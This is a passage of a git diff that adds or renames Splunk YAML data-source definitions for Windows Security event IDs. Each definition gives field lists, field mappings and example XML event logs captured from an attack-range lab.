+++ b/data_sources/windows_event_log_security_4663.yml
@@ -0,0 +1,107 @@
+name: Windows Event Log Security 4663
+id: 5d6dca8c-dad9-494f-a321-ef2b0b92fbf4
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4663
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- AccessList
+- AccessMask
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HandleId
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectName
+- ObjectServer
+- ObjectType
+- Opcode
+- ProcessID
+- ProcessId
+- ProcessName
+- RecordNumber
+- ResourceAttributes
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- name
+- object_file_name
+- object_file_path
+- process
+- process_id
+- process_name
+- process_path
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4663</EventID><Version>1</Version><Level>0</Level><Task>12800</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-02-21T14:08:33.452364300Z'/><EventRecordID>10525869</EventRecordID><Correlation/><Execution
+  ProcessID='4' ThreadID='1212'/><Channel>Security</Channel><Computer>ar-win-2.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>AR-WIN-2\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data
+  Name='SubjectDomainName'>AR-WIN-2</Data><Data Name='SubjectLogonId'>0x6cfe7</Data><Data
+  Name='ObjectServer'>Security</Data><Data Name='ObjectType'>File</Data><Data Name='ObjectName'>C:\Program
+  Files (x86)\ScreenConnect\App_Extensions\evilapp - Copy (2).aspx</Data><Data Name='HandleId'>0x2220</Data><Data
+  Name='AccessList'>%%4424
diff --git a/data_sources/windows_event_log_security_4672.yml b/data_sources/windows_event_log_security_4672.yml
new file mode 100644
index 0000000000..2a3942729b
--- /dev/null
+++ b/data_sources/windows_event_log_security_4672.yml
@@ -0,0 +1,91 @@
+name: Windows Event Log Security 4672
+id: 43f189b6-369d-4a32-a34c-57e0d38d92f1
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4672
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- PrivilegeList
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4672</EventID><Version>0</Version><Level>0</Level><Task>12548</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2023-03-27T18:35:15.439521100Z'/><EventRecordID>148946</EventRecordID><Correlation
+  ActivityID='{a51712a7-60c1-0000-3513-17a5c160d901}'/><Execution ProcessID='624'
+  ThreadID='728'/><Channel>Security</Channel><Computer>ar-win-6.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>ATTACKRANGE\REED_MORSE</Data><Data Name='SubjectUserName'>REED_MORSE</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x509b11</Data><Data
+  Name='PrivilegeList'>SeSecurityPrivilege
diff --git a/data_sources/windows_event_log_security_4688.yml b/data_sources/windows_event_log_security_4688.yml
new file mode 100644
index 0000000000..bb84aab318
--- /dev/null
+++ b/data_sources/windows_event_log_security_4688.yml
@@ -0,0 +1,137 @@
+name: Windows Event Log Security 4688
+id: d195eb26-a81c-45ed-aeb3-25792e8a985a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4688
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- CommandLine
+- Computer
+- Error_Code
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- MandatoryLabel
+- Name
+- NewProcessId
+- NewProcessName
+- Opcode
+- ParentProcessName
+- ProcessID
+- Process_Command_Line
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- TargetDomainName
+- TargetLogonId
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TokenElevationType
+- Token_Elevation_Type
+- Token_Elevation_Type_id
+- Version
+- action
+- app
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- id
+- name
+- new_process
+- new_process_id
+- new_process_name
+- parent_process
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process
+- process_command_line_arguments
+- process_command_line_process
+- process_exec
+- process_id
+- process_name
+- process_path
+- product
+- session_id
+- signature
+- signature_id
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- user
+- user_group
+- vendor
+- vendor_product
+field_mappings:
+  - data_model: cim
+    data_set: Endpoint.Processes
+    mapping:
+      NewProcessId: Processes.process_id
+      NewProcessName: Processes.process_path
+      NewProcessName|endswith: Processes.process_name
+      Process_Command_Line: Processes.process
+      SubjectUserSid: Processes.user
+      ProcessId: Processes.parent_process_id
+      ParentProcessName: Processes.parent_process_path
+      ParentProcessName|endswith: Processes.parent_process_name
+      Computer: Processes.dest
+  - data_model: ocsf
+    mapping:
+      NewProcessId: process.pid
+      NewProcessName: process.file.path
+      NewProcessName|endswith: process.file.name
+      Process_Command_Line: process.cmd_line
+      SubjectUserSid: actor.user.name
+      ProcessId: actor.process.pid
+      ParentProcessName: actor.process.file.path
+      ParentProcessName|endswith: actor.process.file.name
+      Computer: device.hostname
+convert_to_log_source:
+  - data_source: Sysmon Event ID 1
+    mapping:
+      NewProcessId: ProcessId #New_Process_ID in Hex
+      NewProcessName: Image
+      Process_Command_Line: CommandLine
+      SubjectUserSid: User
+      ProcessId: ParentProcessId
+      ParentProcessName: ParentImage
+      Computer: Computer
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4688</EventID><Version>2</Version><Level>0</Level><Task>13312</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-04-23T08:48:30.449376800Z'/><EventRecordID>432820</EventRecordID><Correlation/><Execution
+  ProcessID='4' ThreadID='276'/><Channel>Security</Channel><Computer>ar-win-1</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>NT AUTHORITY\SYSTEM</Data><Data Name='SubjectUserName'>AR-WIN-1$</Data><Data
+  Name='SubjectDomainName'>WORKGROUP</Data><Data Name='SubjectLogonId'>0x3e7</Data><Data
+  Name='NewProcessId'>0xf84</Data><Data Name='NewProcessName'>C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe</Data><Data
+  Name='TokenElevationType'>%%1936</Data><Data Name='ProcessId'>0xb2c</Data><Data
+  Name='CommandLine'>"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
+  --ps2</Data><Data Name='TargetUserSid'>NULL SID</Data><Data Name='TargetUserName'>-</Data><Data
+  Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Program
+  Files\SplunkUniversalForwarder\bin\splunkd.exe</Data><Data Name='MandatoryLabel'>Mandatory
+  Label\System Mandatory Level</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4698.yml b/data_sources/windows_event_log_security_4698.yml
similarity index 69%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_4698.yml
rename to data_sources/windows_event_log_security_4698.yml
index 96adc194c3..4da1f09347 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4698.yml
+++ b/data_sources/windows_event_log_security_4698.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 4698
+name: Windows Event Log Security 4698
+id: 32c06703-02d3-47ec-8856-b0dc3045866c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4698
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - Account_Domain
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4699.yml b/data_sources/windows_event_log_security_4699.yml
similarity index 69%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_4699.yml
rename to data_sources/windows_event_log_security_4699.yml
index d160b5ef93..46eb5e7e31 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4699.yml
+++ b/data_sources/windows_event_log_security_4699.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 4699
+name: Windows Event Log Security 4699
+id: 4727dead-d063-4333-9ddd-59823a416aff
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4699
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - Account_Domain
diff --git a/data_sources/windows_event_log_security_4703.yml b/data_sources/windows_event_log_security_4703.yml
new file mode 100644
index 0000000000..b1c75815b6
--- /dev/null
+++ b/data_sources/windows_event_log_security_4703.yml
@@ -0,0 +1,112 @@
+name: Windows Event Log Security 4703
+id: e256673b-16e8-4b74-b7aa-9eed6ce67072
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4703
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- DisabledPrivilegeList
+- EnabledPrivilegeList
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- ProcessId
+- ProcessName
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetLogonId
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- object_id
+- process
+- process_id
+- process_name
+- process_path
+- product
+- punct
+- result
+- session_id
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- ta_windows_action
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4703</EventID><Version>0</Version><Level>0</Level><Task>13317</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2022-08-31T09:47:43.137598500Z'/><EventRecordID>328761</EventRecordID><Correlation/><Execution
+  ProcessID='4' ThreadID='320'/><Channel>Security</Channel><Computer>win-host-ctus-attack-range-115</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>WIN-HOST-CTUS-A\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data
+  Name='SubjectDomainName'>WIN-HOST-CTUS-A</Data><Data Name='SubjectLogonId'>0x288b91</Data><Data
+  Name='TargetUserSid'>WIN-HOST-CTUS-A\Administrator</Data><Data Name='TargetUserName'>Administrator</Data><Data
+  Name='TargetDomainName'>WIN-HOST-CTUS-A</Data><Data Name='TargetLogonId'>0x288b91</Data><Data
+  Name='ProcessName'>C:\Temp\poc_2\c2_agent.exe</Data><Data Name='ProcessId'>0x570</Data><Data
+  Name='EnabledPrivilegeList'>SeDebugPrivilege</Data><Data Name='DisabledPrivilegeList'>-</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4719.yml b/data_sources/windows_event_log_security_4719.yml
new file mode 100644
index 0000000000..f2fce95f77
--- /dev/null
+++ b/data_sources/windows_event_log_security_4719.yml
@@ -0,0 +1,98 @@
+name: Windows Event Log Security 4719
+id: 954033e6-dd05-4775-a1f2-1f19632f4420
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4719
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AuditPolicyChanges
+- Caller_Domain
+- Caller_User_Name
+- CategoryId
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubcategoryGuid
+- SubcategoryId
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4719</EventID><Version>0</Version><Level>0</Level><Task>13568</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2022-11-03T00:02:53.722907800Z'/><EventRecordID>353597</EventRecordID><Correlation
+  ActivityID='{03951765-EF14-0000-6E17-950314EFD801}'/><Execution ProcessID='644'
+  ThreadID='848'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>NT AUTHORITY\SYSTEM</Data><Data Name='SubjectUserName'>AR-WIN-DC$</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x3e7</Data><Data
+  Name='CategoryId'>%%8276</Data><Data Name='SubcategoryId'>%%13312</Data><Data Name='SubcategoryGuid'>{0CCE922B-69AE-11D9-BED3-505054503030}</Data><Data
+  Name='AuditPolicyChanges'>%%8448, %%8450</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4720.yml b/data_sources/windows_event_log_security_4720.yml
similarity index 76%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_4720.yml
rename to data_sources/windows_event_log_security_4720.yml
index f593ca0b1c..c66b7a7ab9 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4720.yml
+++ b/data_sources/windows_event_log_security_4720.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 4720
+name: Windows Event Log Security 4720
+id: 7ef1c9e5-691b-48c2-811b-eba91d2d2f1d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4720
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - Account_Domain
@@ -95,15 +107,4 @@ fields:
 - user_group_id
 - vendor
 - vendor_product
-field_mappings:
-  - data_model: ocsf
-    mapping:  
-      SubjectDomainName: actor.user.domain
-      SubjectUserName: actor.user.name
-      SubjectLogonId: actor.session.uid
-      SubjectUserSid: actor.user.uid
-      TargetDomainName: user.domain
-      TargetUserName: user.name
-      UserPrincipalName: user.email_addr
-      TargetSid: user.uid
 example_log: 10/09/2020 10:41:26 AM
diff --git a/data_sources/windows_event_log_security_4724.yml b/data_sources/windows_event_log_security_4724.yml
new file mode 100644
index 0000000000..85fbadeebc
--- /dev/null
+++ b/data_sources/windows_event_log_security_4724.yml
@@ -0,0 +1,106 @@
+name: Windows Event Log Security 4724
+id: 117fe51f-93f8-4589-8e8b-c6b7b7154c7d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4724
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4724</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-02-21T18:02:22.774396900Z'/><EventRecordID>276779</EventRecordID><Correlation/><Execution
+  ProcessID='612' ThreadID='6844'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='TargetUserName'>TRUMAN_CLEMENTS</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data
+  Name='TargetSid'>ATTACKRANGE\TRUMAN_CLEMENTS</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data
+  Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data
+  Name='SubjectLogonId'>0x592d1</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4725.yml b/data_sources/windows_event_log_security_4725.yml
new file mode 100644
index 0000000000..f9b68e4c9f
--- /dev/null
+++ b/data_sources/windows_event_log_security_4725.yml
@@ -0,0 +1,106 @@
+name: Windows Event Log Security 4725
+id: 31fd887d-0d14-44cc-bb64-80063a9f2968
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4725
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4725</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-02-21T19:20:19.727858200Z'/><EventRecordID>278771</EventRecordID><Correlation/><Execution
+  ProcessID='612' ThreadID='3184'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='TargetUserName'>WILFORD_SUTTON</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data
+  Name='TargetSid'>ATTACKRANGE\WILFORD_SUTTON</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data
+  Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data
+  Name='SubjectLogonId'>0x592d1</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4726.yml b/data_sources/windows_event_log_security_4726.yml
new file mode 100644
index 0000000000..9dcfc00b39
--- /dev/null
+++ b/data_sources/windows_event_log_security_4726.yml
@@ -0,0 +1,107 @@
+name: Windows Event Log Security 4726
+id: 0b56dcd7-0f72-4a05-9226-d6059781737b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4726
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- PrivilegeList
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4726</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-02-21T19:38:47.481373400Z'/><EventRecordID>279283</EventRecordID><Correlation/><Execution
+  ProcessID='612' ThreadID='3184'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='TargetUserName'>LYNN_WOLF</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data
+  Name='TargetSid'>S-1-5-21-2851375338-1978525053-2422663219-2445</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data
+  Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data
+  Name='SubjectLogonId'>0x592d1</Data><Data Name='PrivilegeList'>-</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4732.yml b/data_sources/windows_event_log_security_4732.yml
similarity index 73%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_4732.yml
rename to data_sources/windows_event_log_security_4732.yml
index 79abe6dd18..490f96750f 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4732.yml
+++ b/data_sources/windows_event_log_security_4732.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 4732
+name: Windows Event Log Security 4732
+id: b0d61c5d-aefe-486a-9152-de45cc10fbb4
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4732
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - Account_Domain
diff --git a/data_sources/windows_event_log_security_4738.yml b/data_sources/windows_event_log_security_4738.yml
new file mode 100644
index 0000000000..a0a4cd9ef0
--- /dev/null
+++ b/data_sources/windows_event_log_security_4738.yml
@@ -0,0 +1,132 @@
+name: Windows Event Log Security 4738
+id: cb85709b-101e-41a9-bb60-d2108f79dfbd
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4738
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- AccountExpires
+- AllowedToDelegateTo
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- DisplayName
+- Dummy
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HomeDirectory
+- HomePath
+- Keywords
+- Level
+- LogonHours
+- Logon_ID
+- Name
+- NewUacValue
+- OldUacValue
